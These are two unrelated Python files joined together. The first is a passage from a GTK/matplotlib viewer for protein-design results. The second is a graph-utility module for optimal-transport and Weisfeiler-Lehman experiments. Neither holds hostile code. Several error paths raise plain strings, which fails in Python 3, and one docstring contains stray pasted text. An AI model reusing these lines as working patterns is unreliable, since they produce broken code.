if self.toolbar._active == 'PAN':
self.toolbar.pan()
if self.toolbar._active == 'ZOOM':
self.toolbar.zoom()
def insert_mode(self):
self.set_focus(self.notes)
def search_mode(self):
self.set_focus(self.search_form)
def zoom_mode(self):
self.toolbar.zoom()
def pan_mode(self):
self.toolbar.pan()
def refocus_plot(self):
self.toolbar.home()
self.normal_mode()
def next_design(self):
selection = self.view.get_selection()
model, paths = selection.get_selected_rows()
num_paths = model.iter_n_children(None)
if paths[-1][0] < model.iter_n_children(None) - 1:
for path in paths: selection.unselect_path(path)
selection.select_path(paths[-1][0] + 1)
self.view.scroll_to_cell(paths[-1][0] + 1)
def previous_design(self):
selection = self.view.get_selection()
model, paths = selection.get_selected_rows()
if paths[0][0] > 0:
for path in paths: selection.unselect_path(path)
selection.select_path(paths[0][0] - 1)
self.view.scroll_to_cell(paths[0][0] - 1)
def cycle_x_metric(self, step=1):
i = self.sorted_metrics.index(self.x_metric)
i = (i + step) % len(self.sorted_metrics)
if self.sorted_metrics[i] == self.y_metric:
i = (i + step) % len(self.sorted_metrics)
# Change the axis by programmatically selecting a new entry in the
# corresponding drop-down menu in the toolbar. This is incredibly
# roundabout (and it kinda breaks encapsulation, although I consider
# ModelViewer and ModelToolbar to be friends), but it's the only way I
# know to keep the drop-down menu in sync.
self.toolbar.x_axis_menu.set_active(i)
def cycle_y_metric(self, step=1):
i = self.sorted_metrics.index(self.y_metric)
i = (i + step) % len(self.sorted_metrics)
if self.sorted_metrics[i] == self.x_metric:
i = (i + step) % len(self.sorted_metrics)
# Change the axis by programmatically selecting a new entry in the
# corresponding drop-down menu in the toolbar. This is incredibly
# roundabout (and it kinda breaks encapsulation, although I consider
# ModelViewer and ModelToolbar to be friends), but it's the only way I
# know to keep the drop-down menu in sync.
self.toolbar.y_axis_menu.set_active(i)
def reverse_cycle_x_metric(self):
self.cycle_x_metric(-1)
def reverse_cycle_y_metric(self):
self.cycle_y_metric(-1)
def save_selected_paths(self):
chooser = gtk.FileChooserDialog(
"Save selected paths",
parent=self,
action=gtk.FILE_CHOOSER_ACTION_SAVE,
buttons=(
gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,
gtk.STOCK_SAVE, gtk.RESPONSE_OK))
chooser.set_current_folder(os.getcwd())
chooser.set_current_name('selected_paths.txt')
response = chooser.run()
if response == gtk.RESPONSE_OK:
selected_designs = [self.designs[key] for key in self.keys]
with open(chooser.get_filename(), 'w') as file:
file.writelines(
os.path.join(
design.directory,
design.paths[design.representative]) + '\n'
for design in selected_designs)
chooser.destroy()
def save_selected_funnels(self):
from matplotlib.backends.backend_pdf import PdfPages
import matplotlib.pyplot as plt
selected_designs = [self.designs[key] for key in self.keys]
chooser = gtk.FileChooserDialog(
"Save selected funnels",
parent=self,
action=gtk.FILE_CHOOSER_ACTION_SAVE,
buttons=(
gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,
gtk.STOCK_SAVE, gtk.RESPONSE_OK))
chooser.set_current_folder(os.getcwd())
chooser.set_current_name('selected_funnels.pdf')
response = chooser.run()
if response == gtk.RESPONSE_OK:
pdf = PdfPages(chooser.get_filename())
for index, design in enumerate(selected_designs):
plt.figure(figsize=(8.5, 11))
plt.suptitle(design.directory)
self.plot_models(plt.gca(), [design])
pdf.savefig()
plt.close()
pdf.close()
chooser.destroy()
def hide_model_list(self):
self.model_list.hide()
self.model_list_toggle.set_active(False)
if not self.filter_pane.props.visible:
self.sidebar.hide()
def show_model_list(self):
self.model_list.show()
self.model_list_toggle.set_active(True)
self.sidebar.show()
def toggle_model_list(self):
if self.model_list.props.visible:
self.hide_model_list()
else:
self.show_model_list()
def hide_filter_pane(self):
self.filter_pane.hide()
self.filter_pane_toggle.set_active(False)
if not self.model_list.props.visible:
self.sidebar.hide()
def show_filter_pane(self):
self.filter_pane.show()
self.filter_pane_toggle.set_active(True)
self.sidebar.show()
def toggle_filter_pane(self):
if self.filter_pane.props.visible:
self.hide_filter_pane()
else:
self.show_filter_pane()
def hide_annotation_pane(self):
self.annotation_pane.hide()
self.annotation_pane_toggle.set_active(False)
def show_annotation_pane(self):
self.annotation_pane.show()
self.annotation_pane_toggle.set_active(True)
def toggle_annotation_pane(self):
if self.annotation_pane.props.visible:
self.hide_annotation_pane()
else:
self.show_annotation_pane()
def hide_legend(self):
if self.is_legend_visible:
self.is_legend_visible = False
self.legend_toggle.set_active(False)
self.update_plot()
def show_legend(self):
if not self.is_legend_visible:
self.is_legend_visible = True
self.legend_toggle.set_active(True)
self.update_plot()
def hide_representative(self):
if self.is_representative_visible:
self.is_representative_visible = False
self.representative_toggle.set_active(False)
self.update_plot()
def show_representative(self):
if not self.is_representative_visible:
self.is_representative_visible = True
self.representative_toggle.set_active(True)
self.update_plot()
def toggle_legend(self):
if self.is_legend_visible:
self.hide_legend()
else:
self.show_legend()
def hide_model_count(self):
if self.is_model_count_visible:
self.is_model_count_visible = False
self.model_count_toggle.set_active(False)
self.update_plot()
def show_model_count(self):
if not self.is_model_count_visible:
self.is_model_count_visible = True
self.model_count_toggle.set_active(True)
self.update_plot()
def toggle_model_count(self):
if self.is_model_count_visible:
self.hide_model_count()
else:
self.show_model_count()
def plot_models(self, axes, designs, **kwargs):
from itertools import count
labels = kwargs.get('labels', None)
x_metric = kwargs.get('x_metric', self.x_metric)
# y_metric = kwargs.get('y_metric', self.y_metric)
# Define the colors that the plot will use.
red = '#ef2929', '#cc0000', '#a40000'
orange = '#fcaf3e', '#f57900', '#ce5c00'
yellow = '#fce94f', '#edd400', '#c4a000'
green = '#8ae234', '#73d216', '#4e9a06'
blue = '#729fcf', '#3465a4', '#204a87'
purple = '#ad7fa8', '#75507b', '#5c3566'
brown = '#e9b96e', '#c17d11', '#8f5902'
grey = '#2e3436', '#555753', '#888a85', '#babdb6', '#d3d7cf', '#eeeeec'
def color_from_cycle(index): #
cycle = (blue[1], red[1], green[2], orange[1], purple[1], brown[1],
blue[0], red[0], green[1], orange[0], purple[0], brown[0])
return cycle[index % len(cycle)]
# Clear the axes and reset the axis labels
axes.clear()
axes.set_xlabel(self.metrics[x_metric].title)
all_designs = {}
if designs:
for index, design in enumerate(designs):
this_design = design.get_metric(x_metric).to_frame()
this_design['name'] = design.directory
all_designs[design.directory] = this_design
data = pd.concat(all_designs)
lines = sns.violinplot(x=data[x_metric], y = data['name'], ax = axes, inner = 'point')
# Pick the axis limits based on the range of every design. This is done
# so you can scroll though every design without the axes changing size.
def get_metric_limits(metric): #
values = np.concatenate([x.get_metric(metric) for x in self])
return self.metrics[metric].limits(values)
x_min, x_max = get_metric_limits(x_metric)
# y_min, y_max = get_metric_limits(y_metric)
x_pad = 0.05 * (x_max - x_min)
# y_pad = 0.05 * (y_max - y_min)
# axes.set_ylim(
# bottom=y_min - y_pad,
# top=y_max + y_pad,
# )
axes.set_xlim(
left=x_min - x_pad,
right=x_max + x_pad,
)
# Draw guides for axes the that have them.
x_guide = self.metrics[self.x_metric].guide
# y_guide = self.metrics[self.y_metric].guide
if x_guide is not None:
axes.axvline(x_guide, color=grey[3], linestyle='--')
# if y_guide is not None:
# axes.axhline(y_guide, color=grey[3], linestyle='--')
# Draw the legend if the user enabled it.
if self.is_legend_visible:
axes.legend(loc='upper right')
if self.is_model_count_visible:
axes.annotate(
', '.join(str(len(x)) for x in designs),
xy=(0, 1), xycoords='axes fraction',
xytext=(8, -8), textcoords='offset points',
verticalalignment='top',
)
def update_everything(self):
self.update_annotations()
self.update_plot()
self.update_designs()
def update_plot(self):
designs = [self.designs[k] for k in self.keys]
self.plot_models(self.axes, designs, labels=self.keys)
self.canvas.draw()
def update_annotations(self):
if len(self.keys) == 1:
design = self.designs[self.keys[0]]
self.notes.get_buffer().set_text(design.notes)
self.notes.set_sensitive(True)
else:
self.notes.set_sensitive(False)
def update_designs(self):
model = self.view.get_model()
selector = self.view.get_selection()
model.clear()
def query_matches_design(design):
needle = self.search_form.get_text()
haystack = design.notes
if needle.islower():
haystack = haystack.lower()
return needle in haystack
for key in sorted(self.designs):
if query_matches_design(self.designs[key]):
model.append([key])
selector.select_path((0,))
class FigureCanvas (FigureCanvasGTK3Agg):
def __init__(self, figure):
FigureCanvasGTK3Agg.__init__(self, figure)
def button_press_event(self, widget, event):
FigureCanvasGTK3Agg.button_press_event(self, widget, event)
return False
class NavigationToolbar (NavigationToolbar2GTK3):
toolitems = (
('Home', 'Reset original view', 'home', 'home'),
('Back', 'Back to previous view', 'back', 'back'),
('Forward', 'Forward to next view', 'forward', 'forward'),
#(None, None, None, None),
('Pan', 'Pan axes with left mouse, zoom with right', 'move', 'pan'),
('Zoom', 'Zoom to rectangle', 'zoom_to_rect', 'zoom'),
#(None, None, None, None),
('Save', 'Save the figure', 'filesave', 'save_figure'),
)
def __init__(self, canvas, parent):
NavigationToolbar2GTK3.__init__(self, canvas, parent)
self.x_axis_menu = parent.setup_metric_menu(
parent.on_change_x_metric, parent.x_metric)
self.y_axis_menu = parent.setup_metric_menu(
parent.on_change_y_metric, parent.y_metric)
table = gtk.Table(3, 4)
table.attach(gtk.SeparatorToolItem(), 0, 1, 0, 3)
table.attach(self.y_axis_menu, 1, 2, 1, 2, xoptions=0, yoptions=0)
table.attach(gtk.Label(' vs. '), 2, 3, 1, 2, xoptions=0, yoptions=0)
table.attach(self.x_axis_menu, 3, 4, 1, 2, xoptions=0, yoptions=0)
tool_item = gtk.ToolItem()
tool_item.add(table)
self.insert(tool_item, len(self.toolitems))
def set_message(self, message):
pass
class FilterPane(gtk.Table):
__gsignals__ = {
'updated' : (
gobject.SIGNAL_RUN_LAST,
gobject.TYPE_NONE,
(),
)
}
def __init__(self, master):
gtk.Table.__init__(self)
self.master = master
self.filters = []
self.action_menu = self.make_action_menu()
self.add_button = self.make_add_button()
self.update_num_rows()
def get_action(self):
### Another fix to get_active_text
#model = self.action_menu.get_model()
#text = model.get_value(
# self.action_menu.get_active_iter(),
# self.action_menu.props.entry_text_column
# )
return self.action_menu.get_active_text().lower()
#return text.lower()
def get_masks(self, design):
keep = np.ones(len(design), dtype='bool')
for filter in self.filters:
name = filter.get_name()
op = filter.get_operator()
try: threshold = float(filter.get_threshold())
except: continue
metric = design.get_metric(name)
if op == '>': result = metric > threshold
if op == '<': result = metric < threshold
if op == '>=': result = metric >= threshold
if op == '<=': result = metric <= threshold
if op == '==': result = metric == threshold
if op == '!=': result = metric != threshold
filter.update_counter(sum(result), len(result))
keep &= result
return keep, np.logical_not(keep)
def make_add_button(self):
button = make_stock_button(gtk.STOCK_ADD)
button.connect('clicked', lambda _: self.add_filter())
align = gtk.Alignment(0.0, 0.5)
align.add(button)
return align
def make_action_menu(self):
### Check here if filtering is messed up
#combo_box = gtk.combo_box_new_text()
combo_box = gtk.ComboBoxText()
combo_box.append_text("Highlight")
combo_box.append_text("Hide")
combo_box.set_active(0)
combo_box.connect('changed', lambda _: self.emit('updated'))
return combo_box
def add_filter(self):
filter = self.Filter(self)
self.filters.append(filter)
self.update_num_rows()
def remove_filter(self, filter):
self.filters.remove(filter)
self.update_num_rows()
def update_num_rows(self):
# Remove everything.
for child in self.get_children():
self.remove(child)
# Re-create the labels.
action_label = gtk.Label("Action:")
action_label.set_alignment(0.0, 0.5)
filter_label = gtk.Label("Filters:")
filter_label.set_alignment(0.0, 0.5)
# Make the table the right size.
rows = max(len(self.filters) + 2, 2)
self.resize(rows, 6)
# Re-attach everything to the table.
fill = dict(xoptions=gtk.FILL, yoptions=gtk.FILL)
self.attach(action_label, 0, 1, 0, 1, **fill)
self.attach(self.action_menu, 1, 2, 0, 1, **fill)
self.attach(filter_label, 0, 1, 1, 2, **fill)
i = 0
for filter in self.filters:
filter.attach(i+1, **fill)
i += 1
self.attach(self.add_button, 1, 2, i+1, i+2, **fill)
self.emit('updated')
self.show_all()
class Filter(object):
def __init__(self, table):
self.table = table
self.filter_menu = table.master.setup_metric_menu()
self.operator_menu = make_operator_menu()
self.threshold_entry = gtk.Entry()
self.threshold_entry.set_width_chars(5)
self.delete_button = make_stock_button(gtk.STOCK_CANCEL)
self.counter = gtk.Label()
self.filter_menu.connect('changed', lambda _: table.emit('updated'))
self.operator_menu.connect('changed', lambda _: table.emit('updated'))
self.threshold_entry.connect('activate', lambda _: table.emit('updated'))
self.delete_button.connect('clicked', lambda _: table.remove_filter(self))
def __repr__(self):
return '<Filter "{} {} {}">'.format(
self.filter_menu.get_active_text(),
self.operator_menu.get_active_text(),
self.threshold_entry.get_text() or '???')
def get_name(self):
return self.filter_menu.get_active_text()
def get_operator(self):
return self.operator_menu.get_active_text()
def get_threshold(self):
return self.threshold_entry.get_text()
def attach(self, i, **fill):
self.table.attach(self.filter_menu, 1, 2, i, i+1, **fill)
self.table.attach(self.operator_menu, 2, 3, i, i+1, **fill)
self.table.attach(self.threshold_entry, 3, 4, i, i+1, **fill)
self.table.attach(self.delete_button, 4, 5, i, i+1, **fill)
self.table.attach(self.counter, 5, 6, i, i+1, **fill)
def update_counter(self, num_kept, num_total):
self.counter.set_text('{}/{}'.format(num_kept, num_total))
class MetricInfo(object):
def __init__(self, name, title, order, guide, limits):
self.name = name
self.title = title
self.order = order
self.guide = guide
self.limits = limits
def __repr__(self):
return '<MetricInfo name="{0}">'.format(self.name)
def make_stock_button(stock):
image = gtk.Image()
image.set_from_stock(stock, gtk.IconSize.BUTTON)
button = gtk.Button()
button.add(image)
return button
def make_operator_menu():
### ComboBoxText
#combo_box = gtk.combo_box_new_text()
combo_box = gtk.ComboBoxText()
options = '<', '>', '<=', '>=', '=', '!='
for option in options:
combo_box.append_text(option)
combo_box.set_active(0)
return combo_box
default_x_metric = 'restraint_dist'
default_y_metric = 'total_score'
metric_titles = {
'total_score': 'Total Score (REU)',
'loop_rmsd': 'Loop RMSD (Å)',
'delta_buried_unsats': 'Δ Buried Unsats',
}
metric_orders = {
}
metric_guides = {
'loop_rmsd': 1.0,
}
metric_limits = {
'total_score': lambda x: (
min(x),
np.percentile(x, 85)),
'loop_rmsd': lambda x: (
0.025 * max(x),
max(x)),
}
def get_metric_title(metric, design=None):
naive_title = metric.replace('_', ' ').title()
return metric_titles.get(metric, naive_title)
def get_metric_order(metric, design=None):
return metric_orders.get(metric)
def get_metric_guide(metric, design=None):
return metric_guides.get(metric)
def get_metric_limits(metric, design=None):
return metric_limits.get(metric, lambda x: (min(x), max(x)))
def show_my_designs(directories, use_cache=True, launch_gui=True,
fork_gui=True, normalize_to_all=True):
try:
designs = load_designs(directories, use_cache=use_cache)
#designs['relax_holo/01_relax_models/outputs/']._load_metrics
if designs and launch_gui:
# If the user wants to run in a background process, try to fork.
# But for some reason fork() doesn't seem to work on Macs, so just
# run the GUI in the main process if anything goes wrong.
try:
if fork_gui and os.fork():
sys.exit()
except Exception:
pass
gui = ShowMyDesigns(designs,
normalize_to_all=normalize_to_all)
gtk.main()
except KeyboardInterrupt:
print()
def show_my_violins(directories, use_cache=True, launch_gui=True, fork_gui=True):
try:
designs = load_designs(directories, use_cache=use_cache)
#designs['relax_holo/01_relax_models/outputs/']._load_metrics
if designs and launch_gui:
# If the user wants to run in a background process, try to fork.
# But for some reason fork() doesn't seem to work on Macs, so just
# run the GUI in the main process if anything goes wrong.
try:
if fork_gui and os.fork():
sys.exit()
except Exception:
pass
gui = ShowMyViolins(designs)
print("designs", designs)
gtk.main()
except KeyboardInterrupt:
print()
def load_designs(directories, use_cache=True):
designs = collections.OrderedDict()
for directory in directories:
try:
designs[directory] = Design(directory, use_cache)
except IOError as error:
if str(error):
print("Error:", str(error))
else:
raise
return designs
def parse_records_from_pdbs(pdb_paths):
records = []
for i, path in enumerate(pdb_paths):
# Update the user on our progress, because this is often slow.
sys.stdout.write("\rReading '{}' [{}/{}]".format(
os.path.dirname(path), i+1, len(pdb_paths)))
sys.stdout.flush()
# Read the PDB file, which we are assuming is gzipped.
try:
def smart_open(path): #
if path.endswith('.gz'): return gzip.open(path)
else: return open(path)
with smart_open(path) as file:
lines = file.readlines()
except IOError:
print("\nFailed to read '{}'".format(path))
continue
# Parse the pdb file. This method may be overloaded to parse
# different kinds of information.
record = {'path': os.path.basename(path)}
parse_record_from_pdb(record, path, lines)
records.append(record)
if pdb_paths: print()
return records
def parse_record_from_pdb(record, pdb_path, lines):
# Get different information from different lines in the PDB file. Some
# of these lines are specific to certain simulations.
for line in lines:
if line.startswith('total_score'):
record['total_score'] = float(line.split()[1])
if line.startswith('pose'):
record['total_score'] = float(line.split()[-1])
if line.startswith('loop_backbone_rmsd'):
record['loop_rmsd'] = float(line.split()[1])
if line.startswith('delta_buried_unsats'):
record['delta_buried_unsats'] = float(line.split()[1])
def try_to_run_command(command):
print(command)
with open(os.devnull, 'w') as devnull:
try: subprocess.Popen(command, stdout=devnull)
except OSError as error:
message = gtk.MessageDialog(
parent=None,
flags=0,
type=gtk.MESSAGE_ERROR,
buttons=gtk.BUTTONS_OK,
)
message.set_markup("<b>Failed to run {}</b>".format(command[0]))
message.format_secondary_text(str(error))
message.run()
message.destroy()
def main():
import docopt
args = docopt.docopt(__doc__)
if args['--version']:
from show_my_designs import __version__
print('{0} {1} (python {2[0]}.{2[1]})'.format(
os.path.basename(sys.argv[0]), __version__, sys.version_info))
raise SystemExit
show_my_designs(
args['<pdb_directories>'],
use_cache=not args['--force'],
launch_gui=not args['--quiet'],
fork_gui=not args['--no-fork'],
)
|
import networkx as nx
import matplotlib.pyplot as plt
import numpy as np
import ot
import time
from scipy.sparse.csgraph import shortest_path
from scipy import sparse
import copy
import matplotlib.colors as mcol
from matplotlib import cm
class NoAttrMatrix(Exception):
pass
class NoPathException(Exception):
pass
"""
Summarizes all the methods and classes related to graphs
"""
#%%
class Graph():
""" Graph is a class that model all the graphs used in the experiments.
Attributes
----------
nx_graph : a networkx graph, optionnal
The networkx graph
C : ndarray
The structure matrix of the graph. Initalize at None
name_struct_dist : string
The name of the method used to compute the structure matrix
name : string,
Name of the graph because life without name has no meaning.
"""
def __init__(self,nx_graph=None):
if nx_graph is not None:
self.nx_graph=nx.Graph(nx_graph)
else:
self.nx_graph=nx.Graph()
self.name='A graph as no name'
self.log={}
self.log['pertoperdistance']=[]
self.log['pathtime']=[]
self.log['attridist']=[]
self.C=None
self.name_struct_dist='No struct name for now'
def __eq__(self, other) :
return self.nx_graph == other.nx_graph
def __hash__(self):
return hash(str(self))
def characterized(self):
if self.name!='A graph as no name':
return self.name
else:
return self
def nodes(self):
""" returns the vertices of a graph """
return dict(self.nx_graph.nodes())
def edges(self):
""" returns the edges of a graph """
return self.nx_graph.edges()
def add_vertex(self, vertex):
""" If the vertex "vertex" is not in
self.graph_dict, a key "vertex" with an empty
list as a value is added to the dictionary.
Otherwise nothing has to be done.
"""
if vertex not in self.nodes():
self.nx_graph.add_node(vertex)
def values(self):
""" returns a list of all the features of the graph"""
return [v for (k,v) in nx.get_node_attributes(self.nx_graph,'attr_name').items()]
def add_nodes(self, nodes):
self.nx_graph.add_nodes_from(nodes)
def add_edge(self, edge):
""" assumes that edge is of type set, tuple orscipy.sparse.csgraph.laplacian¶ list;
between two vertices can be multiple edges!
"""
(vertex1, vertex2) = tuple(edge)
self.nx_graph.add_edge(vertex1,vertex2)
def add_one_attribute(self,node,attr,attr_name='attr_name'):
self.nx_graph.add_node(node,attr_name=attr)
def add_attibutes(self,attributes):
attributes=dict(attributes)
for node,attr in attributes.items():
self.add_one_attribute(node,attr)
def get_attr(self,vertex):
return self.nx_graph.node[vertex]
def reshaper(self,x):
try:
a=x.shape[1]
return x
except IndexError:
return x.reshape(-1,1)
def distance_matrix(self,method='shortest_path',changeInf=True,maxvaluemulti=10,force_recompute=True):
""" Compute the structure matrix of the graph.
It aims at comparing nodes between them using a notion of similarity defined by the "method" parameter
Parameters
----------
method : string, default shortest_path. choices : shortest_path, square_shortest_path, weighted_shortest_path, adjency, harmonic_distance
The method used to compute the structure matrix of the graph :
- shortest_path : compute all the shortest_path between the nodes
- square_shortest_path : same but squared
- weighted_shortest_path : compute the shortest path of the weighted graph with weights the distances between the features of the nodes
- adjency : compute the adjency matrix of the graph
- harmonic_distance : harmonic distance between the nodes
changeInf : bool
If true when the graph has disconnected parts it replaces inf distances by a maxvaluemulti times the largest value of the structure matrix
force_recompute : force to recompute de distance matrix. If False the matrix is computed only if not already compute or if the method used for computing it changes
Returns
-------
C : ndarray, shape (n_nodes,n_nodes)
The structure matrix of the graph
Set also the attribute C of the graph if C does not exist or if force_recompute is True
"""
start=time.time()
if (self.C is None) or force_recompute:
A=nx.adjacency_matrix(self.nx_graph)
if method=='harmonic_distance':
A=A.astype(np.float32)
D=np.sum(A,axis=0)
L=np.diag(D)-A
ones_vector=np.ones(L.shape[0])
fL=np.linalg.pinv(L)
C=np.outer(np.diag(fL),ones_vector)+np.outer(ones_vector,np.diag(fL))-2*fL
C=np.array(C)
elif method=='shortest_path':
C=shortest_path(A)
elif method=='square_shortest_path':
C=shortest_path(A)
C=C**2
elif method=='adjacency':
return A.toarray()
elif method=='augmented_adjacency':
# Add self loops
C = A + np.diag(np.ones(A.shape[0]))
elif method=='normalized_adjacency':
A_ = A.toarray()
deg = np.sum(A_,axis=0)
if 0 in deg:
raise 'isolated node in graph'
else:
D_invsquared = np.diag(1/np.sqrt(deg))
C=D_invsquared.dot(A_).dot(D_invsquared)
elif method=='weighted_shortest_path':
d=self.reshaper(np.array([v for (k,v) in nx.get_node_attributes(self.nx_graph,'attr_name').items()]))
D= ot.dist(d,d)
D_sparse=sparse.csr_matrix(D)
C=shortest_path(A.multiply(D_sparse))
elif method =='laplacian':
A_ = A.toarray()
deg = np.sum(A_,axis=0)
C = np.diag(deg)-A_
elif method =='normalized_laplacian':
A_ = A.toarray()
deg = np.sum(A_,axis=0)
if 0 in deg:
raise 'isolated node in graph'
else:
D_invsquared = np.diag(1/np.sqrt(deg))
M=D_invsquared.dot(A_).dot(D_invsquared)
C= np.eye(A_.shape[0]) - M
elif method =='signed_laplacian':
A_ = A.toarray()
deg = np.sum(A_,axis=0)
C= np.diag(deg)+A_
elif method =='normalized_signed_laplacian':
A_ = A.toarray()
deg = np.sum(A_,axis=0)
if 0 in deg:
raise 'isolated node in graph'
else:
D_invsquared = np.diag(1/np.sqrt(deg))
M=D_invsquared.dot(A_).dot(D_invsquared)
C= np.eye(A_.shape[0]) + M
elif method[0]=='heat_normalized_laplacian':
#compute normalized laplacian
A_ = A.toarray()
deg = np.sum(A_,axis=0)
if 0 in deg:
raise 'isolated node in graph'
else:
D_invsquared = np.diag(1/np.sqrt(deg))
M=D_invsquared.dot(A_).dot(D_invsquared)
norm_L = np.eye(A_.shape[0]) - M
lam, phi = np.linalg.eigh(norm_L)
C= np.matmul(phi,np.matmul(np.diag(np.exp(-method[1]*lam)),phi.T))
elif method[0]=='heat_laplacian':
#compute normalized laplacian
A_ = A.toarray()
deg = np.sum(A_,axis=0)
L= deg -A
lam, phi = np.linalg.eigh(L)
C= np.matmul(phi,np.matmul(np.diag(np.exp(-method[1]*lam)),phi.T))
else:
raise 'UNKNOWN METHOD'
if changeInf==True:
C[C==float('inf')]=maxvaluemulti*np.max(C[C!=float('inf')]) # à voir
self.C=C
self.name_struct_dist=method
end=time.time()
self.log['allStructTime']=(end-start)
return self.C
else :
end=time.time()
self.log['allStructTime']=(end-start)
return self.C
def all_matrix_attr(self,return_invd=False):
d=dict((k, v) for k, v in self.nx_graph.node.items())
x=[]
invd={}
try :
j=0
for k,v in d.items():
x.append(v['attr_name'])
invd[k]=j
j=j+1
if return_invd:
return np.array(x),invd
else:
return np.array(x)
except KeyError:
raise NoAttrMatrix
#%%
def find_thresh(C,inf=0.5,sup=3,step=10):
""" Trick to find the adequate thresholds from where value of the C matrix are considered close enough to say that nodes are connected
Tthe threshold is found by a linesearch between values "inf" and "sup" with "step" thresholds tested.
The optimal threshold is the one which minimizes the reconstruction error between the shortest_path matrix coming from the thresholded adjency matrix
and the original matrix.
Parameters
----------
C : ndarray, shape (n_nodes,n_nodes)
The structure matrix to threshold
inf : float
The beginning of the linesearch
sup : float
The end of the linesearch
step : integer
Number of thresholds tested
"""
dist=[]
search=np.linspace(inf,sup,step)
for thresh in search:
Cprime=sp_to_adjency(C,0,thresh)
SC=shortest_path(Cprime,method='D')
SC[SC==float('inf')]=100
dist.append(np.linalg.norm(SC-C))
return search[np.argmin(dist)],dist
def sp_to_adjency(C,threshinf=0.2,threshsup=1.8):
""" Thresholds the structure matrix in order to compute an adjency matrix.
All values between threshinf and threshsup are considered representing connected nodes and set to 1. Else are set to 0
Parameters
----------
C : ndarray, shape (n_nodes,n_nodes)
The structure matrix to threshold
threshinf : float
The minimum value of distance from which the new value is set to 1
threshsup : float
The maximum value of distance from which the new value is set to 1
Returns
-------
C : ndarray, shape (n_nodes,n_nodes)
The threshold matrix. Each element is in {0,1}
"""
H=np.zeros_like(C)
np.fill_diagonal(H,np.diagonal(C))
C=C-H
C=np.minimum(np.maximum(C,threshinf),threshsup)
C[C==threshsup]=0
C[C!=0]=1
return C
def relabel_graph_order(graph):
relabel_dict_={}
graph_node_list=list(graph.nodes())
for i in range(len(graph_node_list)):
relabel_dict_[graph_node_list[i]]=i
i+=1
inv_relabel_dict_={v:k for k,v in relabel_dict_.items()}
graph_relabel=nx.relabel_nodes(graph,relabel_dict_)
return graph_relabel,inv_relabel_dict_
def wl_labeling(graph,h=2,tohash=True):
""" Computes the Weisfeler-Lehman labeling for all nodes
Parameters
----------
graph : Graph
The Graph to relabel
h : integer
The number of iteration of the Weisfeler-Lehman coloring. See [4]
tohash : bool, optionnal
Wether to hash the concatenated labeled
Returns
-------
graphs : Graph,
The relabeled graph
References
----------
.. [4] <NAME> and Pierre{-}<NAME> and <NAME>
"On Valid Optimal Assignment Kernels and Applications to Graph Classification"
Advances in Neural Information Processing Systems 29 (NIPS). 2016.
"""
niter=1
final_graph=nx.Graph(graph)
graph_relabel,inv_relabel_dict_=relabel_graph_order(final_graph)
l_aux = list(nx.get_node_attributes(graph_relabel,'attr_name').values())
labels = np.zeros(len(l_aux), dtype=np.int32)
adjency_list = list([list(x[1].keys()) for x in graph_relabel.adjacency()]) #adjency list à l'ancienne comme version 1.0 de networkx
for j in range(len(l_aux)):
labels[j] = l_aux[j]
new_labels = copy.deepcopy(l_aux)
while niter<=h:
labeled_graph=nx.Graph(final_graph)
graph_relabel,inv_relabel_dict_=relabel_graph_order(final_graph)
l_aux = list(nx.get_node_attributes(graph_relabel,'attr_name'+str(niter-1)).values())
adjency_list = list([list(x[1].keys()) for x in graph_relabel.adjacency()]) #adjency list à l'ancienne comme version 1.0 de networkx
for v in range(len(adjency_list)):
# form a multiset label of the node v of the i'th graph
# and convert it to a string
prev_neigh=np.sort([labels[adjency_list[v]]][-1])
long_label = np.concatenate((np.array([[labels[v]][-1]]),prev_neigh))
long_label_string = ''.join([str(x) for x in long_label])
#print('Type_labels before',type(labels))
new_labels[v] =long_label_string
#print('Type_labels after',type(labels))
labels = np.array(copy.deepcopy(new_labels))
dict_={inv_relabel_dict_[i]:labels[i] for i in range(len(labels))}
nx.set_node_attributes(labeled_graph,dict_,'attr_name'+str(niter))
niter+=1
final_graph=nx.Graph(labeled_graph)
dict_values={} # pas sûr d'ici niveau de l'ordre des trucs
for k,v in final_graph.nodes().items():
hashed=sorted([str(x) for x in v.values()], key=len)
if tohash :
dict_values[k]=np.array([hash(x) for x in hashed])
else:
dict_values[k]=np.array(hashed)
graph2=nx.Graph(graph)
nx.set_node_attributes(graph2,dict_values,'attr_name')
return graph2
def graph_colors(nx_graph,vmin=0,vmax=7):
cnorm = mcol.Normalize(vmin=vmin,vmax=vmax)
cpick = cm.ScalarMappable(norm=cnorm,cmap='viridis')
cpick.set_array([])
val_map = {}
for k,v in nx.get_node_attributes(nx_graph,'attr_name').items():
val_map[k]=cpick.to_rgba(v)
colors=[]
for node in nx_graph.nodes():
colors.append(val_map[node])
return colors
def draw_rel(G,draw=True,edge_color='g',shiftx=0,shifty=0,return_pos=False,with_labels=True,swipy=False,swipx=False,vmin=0,vmax=7):
pos=nx.kamada_kawai_layout(G)
if shiftx!=0 or shifty!=0:
for k,v in pos.items():
# Shift the x values of every node by shiftx,shifty
if shiftx!=0:
v[0] = v[0] +shiftx
if shifty!=0:
v[1] = v[1] +shifty
if swipy:
v[1]=-v[1]
if swipx:
v[0]=-v[0]
#colors=graph_colors(G,vmin=vmin,vmax=vmax)
if with_labels:
#nx.draw(G,pos,with_labels=True,labels=nx.get_node_attributes(G,'attr_name'),node_color = colors)
nx.draw(G,pos,with_labels=True,labels=nx.get_node_attributes(G,'attr_name'))
else:
nx.draw(G,pos,with_labels=False,edge_color=edge_color)#,node_color = colors)
if draw:
plt.show()
if return_pos :
return pos
def draw_transp(G1,G2,transp,shiftx=1,shifty=1,thresh=0.09,swipy=False,swipx=False,vmin=0,vmax=1.01,with_labels=False):
#pos1=draw_rel(G1.nx_graph,draw=False,return_pos=True,vmin=vmin,vmax=vmax,with_labels=with_labels)
#pos2=draw_rel(G2.nx_graph,draw=False,shiftx=shiftx,shifty=shifty,return_pos=True,swipx=swipx,swipy=swipy,vmin=vmin,vmax=vmax,with_labels=with_labels)
pos1=draw_rel(G1,draw=False,return_pos=True,vmin=vmin,vmax=vmax,with_labels=with_labels,edge_color='g')
pos2=draw_rel(G2,draw=False,shiftx=shiftx,shifty=shifty,return_pos=True,swipx=swipx,swipy=swipy,vmin=vmin,vmax=vmax,with_labels=with_labels,edge_color='r')
def all_matrix_attr(G,return_invd=True):
d=dict((k, v) for k, v in dict(G.nodes()).items())
x=[]
invd={}
try :
j=0
for k,v in d.items():
x.append(0.5)
invd[k]=j
j=j+1
if return_invd:
return np.array(x),invd
else:
return np.array(x)
except KeyError:
raise NoAttrMatrix
